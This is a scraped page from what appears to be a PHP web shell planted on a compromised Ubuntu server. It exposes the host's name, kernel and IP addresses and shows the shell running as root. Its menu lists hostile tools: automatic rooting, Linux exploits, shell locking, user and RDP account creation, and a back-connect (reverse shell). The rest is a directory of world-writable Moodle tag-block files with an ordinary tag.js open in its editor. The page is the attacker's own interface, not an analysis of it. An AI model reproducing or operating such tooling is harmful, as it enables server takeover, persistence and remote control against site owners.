Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
tag /
[ HOME SHELL ]
Name
Size
Permission
Action
coursetags_add.php
1.83
KB
-rwxrwxrwx
coursetags_edit.php
8.02
KB
-rwxrwxrwx
coursetags_more.php
7.71
KB
-rwxrwxrwx
coursetagslib.php
14.13
KB
-rwxrwxrwx
edit.php
5.76
KB
-rwxrwxrwx
edit_form.php
2.75
KB
-rwxrwxrwx
index.php
6.55
KB
-rwxrwxrwx
lib.php
44.45
KB
-rwxrwxrwx
locallib.php
14.96
KB
-rwxrwxrwx
manage.php
12.63
KB
-rwxrwxrwx
search.php
2.21
KB
-rwxrwxrwx
tag.js
2.25
KB
-rwxrwxrwx
tag_autocomplete.php
1.25
KB
-rwxrwxrwx
upgrade.txt
381
B
-rwxrwxrwx
user.php
1.44
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tag.js
var coursetagdivs = null; var coursetag_tags = new Array(); function init_tag_autocomplete() { YUI().use('yui2-autocomplete', 'yui2-datasource', 'yui2-animation', 'yui2-connection', function(Y) { var myDataSource = new Y.YUI2.util.XHRDataSource("./tag_autocomplete.php"); myDataSource.responseType = Y.YUI2.util.XHRDataSource.TYPE_TEXT; myDataSource.responseSchema = { recordDelim: "\n", fieldDelim: "\t" }; myDataSource.maxCacheEntries = 60; myDataSource.minQueryLength = 3; // Instantiate the AutoComplete var myAutoComp = new Y.YUI2.widget.AutoComplete("id_relatedtags", "relatedtags-autocomplete", myDataSource); document.getElementById('id_relatedtags').style.width = '30%'; myAutoComp.allowBrowserAutocomplete = false; myAutoComp.maxResultsDisplayed = 20; myAutoComp.delimChar = [","," "]; myAutoComp.formatResult = function(oResultData, sQuery, sResultMatch) { return (sResultMatch); }; return { myDataSource: myDataSource, myAutoComp: myAutoComp }; }); } function ctags_checkinput(val) { var len = val.length; if (len < 2 || len > 50) { alert(M.str.block_tags.jserror1); return false; } else if (val.indexOf("<") > 0) { alert(M.str.block_tags.jserror2); return false; } else if (val.indexOf(">") > 0) { alert(M.str.block_tags.jserror2); return false; } else { return true; } } function set_course_tag(key) { window.coursetag_tags[window.coursetag_tags.length] = key; } function add_tag_footer_link(eid, ltitle, laction, ltext) { var e = document.getElementById(eid); if (e) { var link = document.createElement('a'); link.setAttribute('href', ''); link.setAttribute('title', ltitle); link.appendChild(document.createTextNode(ltext)); var callback = function () { ctags_show_div(laction); }; YUI().use('yui2-event', function(Y) { Y.YUI2.util.Event.addListener(link, 'click', callback); }); if (e.childNodes.length > 0) { e.appendChild(document.createTextNode(' | ')); } else { e.appendChild(document.createElement('hr')); } e.appendChild(link); } }
Close